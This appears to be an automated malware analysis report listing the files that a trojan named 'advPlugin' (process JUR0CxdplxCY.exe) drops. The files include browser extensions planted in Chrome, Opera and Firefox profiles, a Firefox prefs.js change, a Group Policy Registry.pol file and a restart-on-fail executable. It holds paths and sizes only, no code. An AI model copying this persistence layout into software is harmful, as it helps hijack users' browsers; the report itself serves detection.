C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\bindings.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.js (659 bytes)
%Program Files% (x86)\advPlugin\files\_locales\de\messages.json (338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\am\messages.json (341 bytes)
C:\Windows\SysWOW64\GroupPolicy\Machine\Registry.pol (582 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\am\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\te\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sv\messages.json (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\vi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ar\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\da\messages.json (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sv\messages.json (344 bytes)
%Program Files% (x86)\advPlugin\files\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\am\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\uk\messages.json (476 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\lt\messages.json (369 bytes)
%Program Files% (x86)\advPlugin\files\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\bn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\InstallerHelper.dll (11663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Kernel.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lt\messages.json (369 bytes)
%Program Files% (x86)\advPlugin\files\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome.manifest (78 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\bindings.xml (1 bytes)
%Program Files% (x86)\advPlugin\files\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.html (199 bytes)
%Program Files% (x86)\advPlugin\files\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bg\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\th\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\popup.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\bindings.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\da\messages.json (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pt_PT\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\Kernel.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\advPlugin_restartonfail\commandLineToRun.txt (82 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sv\messages.json (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Kernel.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\id\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\icon16.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\icons\icon19.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (1448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\nl\messages.json (362 bytes)
%Program Files% (x86)\advPlugin\info.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\arrow.png (332 bytes)
%Program Files% (x86)\advPlugin\files\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\tr\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\icons\icon19.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ko\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sq\messages.json (366 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\background.html (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\be\messages.json (437 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon128.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon16.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\tr\messages.json (355 bytes)
%Program Files% (x86)\advPlugin\files\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\popup.js (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ru\messages.json (431 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\advPlugin_restartonfail_exe\JUR0CxdplxCY.exe (14988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\da\messages.json (345 bytes)
%Program Files% (x86)\advPlugin\files\background.html (129 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\hr\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fr\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\th\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\Toolbar32.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\kn\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ru\messages.json (431 bytes)
%Program Files% (x86)\advPlugin\Toolbar32.tlb (2 bytes)
%Program Files% (x86)\advPlugin\files\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\be\messages.json (437 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bg\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\th\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\be\messages.json (437 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\files\_locales\lt\messages.json (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ja\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\kn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\bn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\foreground.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\no\messages.json (328 bytes)
%Program Files% (x86)\advPlugin\files\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lt\messages.json (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CD.tmp\System.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\vi\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\tr\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sv\messages.json (344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\popup.js (364 bytes)
%Program Files% (x86)\advPlugin\files\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_BR\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon128.png (12 bytes)

The process JUR0CxdplxCY.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsv2684.tmp (5256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl2695.tmp\System.dll (808 bytes)
